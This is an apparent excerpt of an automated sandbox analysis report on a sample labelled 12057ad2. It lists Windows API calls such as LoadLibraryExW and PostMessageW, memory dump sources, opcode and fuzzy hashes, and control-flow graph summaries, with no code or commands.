                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 3911e05dd2b292888b7f2bf2d7d221328615687f4827e1d0b759e44569e339d7
                                                • Instruction ID: 220ad011d85b0282d4064e401a2b108a3b4b2d6c56f404a8e76190d52008d71d
                                                • Opcode Fuzzy Hash: 3911e05dd2b292888b7f2bf2d7d221328615687f4827e1d0b759e44569e339d7
                                                • Instruction Fuzzy Hash: F52100B5900209DFCB00CFA9D884BEEBBF4FB48324F15841AE914A3310D378A954CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 • Control-flow Graph (basic blocks and edges): 427 df7758-df775a 428 df775e-df77b4 427->428 429 df775c 427->429 432 df77b6-df77de KiUserCallbackDispatcher 428->432 433 df7802-df781b 428->433 429->428 434 df77e7-df77fb 432->434 435 df77e0-df77e6 432->435 434->433 435->434
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DF77CD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 082980bb200b67f2fe9c7b23f7dcef5dee65e7b18b733c741a665c732890f714
                                                • Instruction ID: 3f59a057f05bb6db43813261346c00fbe21eb279541f258b1f7f4f9ce3af44c3
                                                • Opcode Fuzzy Hash: 082980bb200b67f2fe9c7b23f7dcef5dee65e7b18b733c741a665c732890f714
                                                • Instruction Fuzzy Hash: 07219A71809389CFCB11DF64D4447EABFF4EB19328F1584ADD186A7242C778AA49CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 • Control-flow Graph (basic blocks and edges): 437 df8c94-df9510 439 df9518-df9547 LoadLibraryExW 437->439 440 df9512-df9515 437->440 441 df9549-df954f 439->441 442 df9550-df956d 439->442 440->439 441->442
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DF9329,00000800,00000000,00000000), ref: 00DF953A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5446c5143081cbf877e50d1459c6be6db048ba2b019f75a1eb93df5c825543e9
                                                • Instruction ID: 619320c15cfb4e37d3b75cf43771896d9362413db5eaafb12aa260bc09645737
                                                • Opcode Fuzzy Hash: 5446c5143081cbf877e50d1459c6be6db048ba2b019f75a1eb93df5c825543e9
                                                • Instruction Fuzzy Hash: EF1103B6D002089FDB10CF9AD444BEEFBF4EB48324F15842AD515A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 • Control-flow Graph (basic blocks and edges): 445 6b24db0-6b24df8 447 6b24e00-6b24e2f SetWindowTextW 445->447 448 6b24dfa-6b24dfd 445->448 449 6b24e31-6b24e37 447->449 450 6b24e38-6b24e59 447->450 448->447 449->450
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06B24E22
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: 2cb30d7cac5d27e70711f44257af7ddb2e1a0ae67eb5a1bb2f76151b209d62a4
                                                • Instruction ID: 622433ec8953ea96557b215af0e0d4ce25f5ce3696087ddc6797db288bc9f311
                                                • Opcode Fuzzy Hash: 2cb30d7cac5d27e70711f44257af7ddb2e1a0ae67eb5a1bb2f76151b209d62a4
                                                • Instruction Fuzzy Hash: 181117B2D006498FDB14CF9AD844BDEFBF4EF48320F04846AD869A3640D338A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                 • Control-flow Graph (basic blocks and edges): 452 df94cb-df9510 453 df9518-df9547 LoadLibraryExW 452->453 454 df9512-df9515 452->454 455 df9549-df954f 453->455 456 df9550-df956d 453->456 454->453 455->456
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DF9329,00000800,00000000,00000000), ref: 00DF953A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: acd4d11465fbbcf726641411f937d95605d6dfecd3c372a3031efdcfdd16f151
                                                • Instruction ID: c1328a3653f709882c8a7fac7eed95ac41f668857df30b2648fb0a8e1983f4aa
                                                • Opcode Fuzzy Hash: acd4d11465fbbcf726641411f937d95605d6dfecd3c372a3031efdcfdd16f151
                                                • Instruction Fuzzy Hash: D51114B2D002099FCB10CF9AD844BDEFBF4EB48324F05842AD919A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 08080BC8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: dff039ae9a39fade6845ddfbbed49ba2d22825027a162ccbe44253efa802e450
                                                • Instruction ID: d88e78086f3b967365872409cf138d47c8a6ce9ecb7b8ce54fc7d6d7bd9e0b29
                                                • Opcode Fuzzy Hash: dff039ae9a39fade6845ddfbbed49ba2d22825027a162ccbe44253efa802e450
                                                • Instruction Fuzzy Hash: 7611F9B1C002499FDB10CF99D844BDEFBF4FB48324F148429E555A7240C374A955DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06B24E22
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: 1a18aaf0d1c72193492b4f18bdaaf3367eb140fbc89c661e3c59dbec758ad9b9
                                                • Instruction ID: ab6ac12da85a133020aa811c00727fe8a81c220f8aff53e9b73db15b5c376827
                                                • Opcode Fuzzy Hash: 1a18aaf0d1c72193492b4f18bdaaf3367eb140fbc89c661e3c59dbec758ad9b9
                                                • Instruction Fuzzy Hash: 3511E4B2D002598FDB14CF9AD844BDEFBF4EF88320F14846AD869A7640D378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 08080BC8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 0fb7d8f86f3c15c2a744a59be16cb84b7fdf1a1e11e1bf7afba12d15b46532f3
                                                • Instruction ID: 04c46441b7f7e07ad361dc5be6f71738978da3b578ecf6f33bd9b7eea068f7c4
                                                • Opcode Fuzzy Hash: 0fb7d8f86f3c15c2a744a59be16cb84b7fdf1a1e11e1bf7afba12d15b46532f3
                                                • Instruction Fuzzy Hash: 4711F6B18002099FDB10CF9AD844BDEFBF8FB48324F04842AE955A3240C378A955DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06B2A985
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 67c77c718369ec5bb592252a3b378046d37897aeac58d7b0854a91de84b33d73
                                                • Instruction ID: b04b9be56727fffbda2bd0a19729acb4bc23bf735a1da0f56b0de0132d939f13
                                                • Opcode Fuzzy Hash: 67c77c718369ec5bb592252a3b378046d37897aeac58d7b0854a91de84b33d73
                                                • Instruction Fuzzy Hash: CA112BB18003499FDB10CF9AC845BDEFBF4EB48320F148459E554A3601D379A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DF77CD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 2100ae0a1d16459c91876ecf7f518bec9ef122782356389612fb69f44c584226
                                                • Instruction ID: 3185e7be8149a8124137129dd0d63440fe6be4c4af9b0beb2f7fc7f045b8896a
                                                • Opcode Fuzzy Hash: 2100ae0a1d16459c91876ecf7f518bec9ef122782356389612fb69f44c584226
                                                • Instruction Fuzzy Hash: 9C119A71804388CFDB10DF99D8047EEBFF4EB08328F14846DD596A7242C778AA44CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06B2A985
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: ae744ca35d930e1a81c9cc3524843bb0723426d5ec27d32d0f7040e89d72ccd5
                                                • Instruction ID: 7f8e17f41f3686b865863212def84b201352b218751800fbb0787ac0e172df89
                                                • Opcode Fuzzy Hash: ae744ca35d930e1a81c9cc3524843bb0723426d5ec27d32d0f7040e89d72ccd5
                                                • Instruction Fuzzy Hash: C81106B18003499FDB10CF9AC885BEEFBF8FB48324F148459E558A3641D379A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00DF92AE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 7fb7517e4bf9eeb088e1f2334819c3ab0aee7c1ef35df53ce9d4ff563f50baa2
                                                • Instruction ID: c3b062626ea69fced0269a6d3045098425d826dc8e4934c2d5e1801003a08588
                                                • Opcode Fuzzy Hash: 7fb7517e4bf9eeb088e1f2334819c3ab0aee7c1ef35df53ce9d4ff563f50baa2
                                                • Instruction Fuzzy Hash: 9C1110B2C002099FCB20CF9AC844BDEFBF4EF88324F15842AD519A7200C374A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 90e3bb5bf6e86bb72e71c4ebe807f00bb292bc0a840a7e60248a76ccc8e8295e
                                                • Instruction ID: 9fb3abec736afb5a21a92612127c4f77b0e385cf8bd44b8b393a620dc521e51e
                                                • Opcode Fuzzy Hash: 90e3bb5bf6e86bb72e71c4ebe807f00bb292bc0a840a7e60248a76ccc8e8295e
                                                • Instruction Fuzzy Hash: F411F2B1C042499FCB20DF9AD844BDEFBF4EF48324F14846AD459A3200D378A685CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06B2625D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0d87e4dbf0282cf1031605e396e465c50ccd7781910f6d575c9ecc1bdbb97fee
                                                • Instruction ID: bee333eea7ad54dcdfb0c90b3aa0ad542263ca0ae29d51bf441bb911182b75c3
                                                • Opcode Fuzzy Hash: 0d87e4dbf0282cf1031605e396e465c50ccd7781910f6d575c9ecc1bdbb97fee
                                                • Instruction Fuzzy Hash: D611E2B58003499FDB20CF99D889BDEFBF8FB48324F14845AE559A7200D375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06B2625D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 18aac5a1236f0e3fc867a9bef026664f8b3a2c61ccc080f9d03c28dbd0b0098e
                                                • Instruction ID: 3549a91d7783c4e0b6732e0558ba1a7df198f78f76c2e76afd77a00c5355962a
                                                • Opcode Fuzzy Hash: 18aac5a1236f0e3fc867a9bef026664f8b3a2c61ccc080f9d03c28dbd0b0098e
                                                • Instruction Fuzzy Hash: 8211E2B58003499FDB20CF99D889BDEFBF8FB48324F14845AE559A7200D375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 5d3fa88ebaf79e66802fad99b71d65f6a334a5976e1284fc3deb16134d695537
                                                • Instruction ID: 73f8e03469fae1ced12b0179f51a6935c536d7d4fd612bf2981242594dcfb0fa
                                                • Opcode Fuzzy Hash: 5d3fa88ebaf79e66802fad99b71d65f6a334a5976e1284fc3deb16134d695537
                                                • Instruction Fuzzy Hash: F811CEB1D046498FCB20DF9AD844BDEFBF8EB48324F14856AD459A3200D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573234224.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_d9d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76c0591ab10d5a350bf5f18f3ec6696ee7b99ab83b05764161efd002b87f601b
                                                • Instruction ID: f5eb812c2f5c0b0223fc069b79dd87b921c04549e1166fc8fc90eaa827eb6e0c
                                                • Opcode Fuzzy Hash: 76c0591ab10d5a350bf5f18f3ec6696ee7b99ab83b05764161efd002b87f601b
                                                • Instruction Fuzzy Hash: 212134B1604200DFDF14DF10D9C4F26BB66FB98324F28C669E9094B246C336E846CBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5dedb7e87719495b103c85e4a8f0ce0d7c7db6d2e212f67c58bbf9563562b069
                                                • Instruction ID: f5681153f47bfd997e255184155c82621ca3f789b260a0ac42a6c4fe2b1f6581
                                                • Opcode Fuzzy Hash: 5dedb7e87719495b103c85e4a8f0ce0d7c7db6d2e212f67c58bbf9563562b069
                                                • Instruction Fuzzy Hash: FF2107B5608240DFDB14CF10D9C4B26BB66FB89314F24C66DD94A4B646C33AD847CA75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c06871fc0ed38c4f269180aa32e2837cd649a07fbb4399fdfa9045a4e85495c
                                                • Instruction ID: 32f6e5f1e8219d16a0d07103d0fe6644e0679c5df0d0d766e3f031c57e29def1
                                                • Opcode Fuzzy Hash: 7c06871fc0ed38c4f269180aa32e2837cd649a07fbb4399fdfa9045a4e85495c
                                                • Instruction Fuzzy Hash: CA2107B5504200EFDB15CF10D9C4F26BB66FB85318F24CA6DD94A4B656C336DC46CA71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13c47662647e30e6146c3168dcab2dddea58de895cd7004fa4292515d6ccf04b
                                                • Instruction ID: e5b7bcc587c18d73fa43a7cb0d27fe9c4df3f1fd2e946a1e9c4f420f7ab9c662
                                                • Opcode Fuzzy Hash: 13c47662647e30e6146c3168dcab2dddea58de895cd7004fa4292515d6ccf04b
                                                • Instruction Fuzzy Hash: 2C2162755093C08FCB12CF24D994B15BF72EB46314F28C5EAD8498F697C33A984ACB62
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573234224.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_d9d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction ID: 201605e4d08a1f956fadbad77a8613788c61ffb2abc92cd249d2d36caf702b05
                                                • Opcode Fuzzy Hash: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction Fuzzy Hash: 6811C876504280DFDF15CF10D9C4B16BF72FB94324F28C6A9D8494B656C336E85ACBA1
                                                Uniqueness
                                                • Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: ebec631b81c1644c0b48c1c6ccde9fdec0ea5d26873c6cd3a701fab8ccaf0306
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: CC119D75904280DFCB11CF10D5C4B19FBB2FB85324F28C6ADD84A4BA56C33AD84ACB61
                                                Uniqueness
                                                • Uniqueness Score: -1.00%